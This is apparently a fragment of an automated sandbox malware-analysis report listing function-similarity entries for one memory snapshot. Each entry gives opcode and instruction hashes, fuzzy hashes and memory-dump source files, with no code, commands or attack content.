                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 66b02387087ac6b4c298430631d3fd88d37cfb554a79521d32fad5360a4f41ab
                                                              • Instruction ID: cbbbc8ea32ae648ea1706936f70d1458c525f501ba06ff922fe1dbeac05893aa
                                                              • Opcode Fuzzy Hash: 66b02387087ac6b4c298430631d3fd88d37cfb554a79521d32fad5360a4f41ab
                                                              • Instruction Fuzzy Hash: F081E661D0978597E6219B398A417EBB7E8AFF9304F049B28AECD61113FB31B5D48342
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: same 15 memory dumps as listed under the first Memory Dump Source entry above
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 18bafd49ede21efb11b0b585cb1068e6d313a12440042795a624696a6d52d972
                                                              • Instruction ID: c55fb9391104a2bef3818d32a67143599bf755e513d63beae79aea8f4e6ae0c7
                                                              • Opcode Fuzzy Hash: 18bafd49ede21efb11b0b585cb1068e6d313a12440042795a624696a6d52d972
                                                              • Instruction Fuzzy Hash: 4E712832A08B19CBC7189F18C89472AB7E1FFC5328F59872DD8954B385D334E954CB82
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: same 15 memory dumps as listed under the first Memory Dump Source entry above
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 166e17c2781cdcc9b59be134103c19889ed386e54c0861dda6c9617cee48f4d3
                                                              • Instruction ID: 28283b33fa2a93ea8e389325e368ff4c89b5c4fbbfb0419089854e43ea1d3fdd
                                                              • Opcode Fuzzy Hash: 166e17c2781cdcc9b59be134103c19889ed386e54c0861dda6c9617cee48f4d3
                                                              • Instruction Fuzzy Hash: 8C815D72D14B8287D7199F68C8906B6BBA0FFDA314F14471EEAEA0B783E7749181C741
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: same 15 memory dumps as listed under the first Memory Dump Source entry above
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 44ac858ee5f0fc3f81803183741d57923c6bb98f2b15c1c057eac2561ea5750d
                                                              • Instruction ID: ab1b59415645ab81cd87f4a42c1745361757537d624e5d384f80b729b6ce9601
                                                              • Opcode Fuzzy Hash: 44ac858ee5f0fc3f81803183741d57923c6bb98f2b15c1c057eac2561ea5750d
                                                              • Instruction Fuzzy Hash: FA81EA72D14B829BD3198F68C8906B6B7A0FFDA314F14971EEAEA07743E7749580C741
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: same 15 memory dumps as listed under the first Memory Dump Source entry above
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ee726186c788c664535448a820c1fb85317cacb34421184c0c940f1e10eca9d5
                                                              • Instruction ID: b1b0e35368f3dfdaff823e24fd92334b2e3414646c884079b5aad0b0b0d05663
                                                              • Opcode Fuzzy Hash: ee726186c788c664535448a820c1fb85317cacb34421184c0c940f1e10eca9d5
                                                              • Instruction Fuzzy Hash: 00614872D287918FD316CF28C8806697BA2FFC6314F2983ADE9951B397E7749A41C740
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: same 15 memory dumps as listed under the first Memory Dump Source entry above
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                              • Instruction ID: 7d0d18a9719936b35e7e47c2ace0e289605319b8d5bf651aa9eebd4fba78fdb6
                                                              • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                              • Instruction Fuzzy Hash: F231C53171A35A4BC715EDADC4C032AF6D79BE8260F55C63DE689C3389E9B18C488781
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: same 15 memory dumps as listed under the first Memory Dump Source entry above
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b1bfc2c4732e7c476e6b46f5c9e24aaa174a52cf4d98bcdd34b50caf0c7d2cb
                                                              • Instruction ID: 313505505ebf0cdbbd1e2d97939e3d85ed8e226cf2139c41bf6d3e0e5b5ba13f
                                                              • Opcode Fuzzy Hash: 4b1bfc2c4732e7c476e6b46f5c9e24aaa174a52cf4d98bcdd34b50caf0c7d2cb
                                                              • Instruction Fuzzy Hash: 6DB01231D002008B6717C93CD8710D132B273C122435BC4E8D0034A016D636E0068745
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: same 15 memory dumps as listed under the first Memory Dump Source entry above
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: [
                                                              • API String ID: 0-784033777
                                                              • Opcode ID: 6cf5609dde558f9c12c104c8695f5146d503d97ccbcfa33edbb1b4794b3863e6
                                                              • Instruction ID: 92f6613a6385ffafed56a03279054b67b9e0d4ca430e1e6b5e445f573fbd4a87
                                                              • Opcode Fuzzy Hash: 6cf5609dde558f9c12c104c8695f5146d503d97ccbcfa33edbb1b4794b3863e6
                                                              • Instruction Fuzzy Hash: D8B17771A0838D6BDB399A34C89077BBBD8EFA530CF18652DEBC5E6181E765CC448352
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: islower
                                                              • String ID: $
                                                              • API String ID: 3326879001-3993045852
                                                              • Opcode ID: ea0f4f2f02c77cff6850d85ad844458c6e7b1f7dbe77ef8bfb68b44ec121d332
                                                              • Instruction ID: de047716261237442c373baa97846b384045e8065f40d874f8a8966c49c358b0
                                                              • Opcode Fuzzy Hash: ea0f4f2f02c77cff6850d85ad844458c6e7b1f7dbe77ef8bfb68b44ec121d332
                                                              • Instruction Fuzzy Hash: 3A61F9706283468BC714DF6CC48026FFBF2AFE9314F548A2DE9D587399E2B0D9458742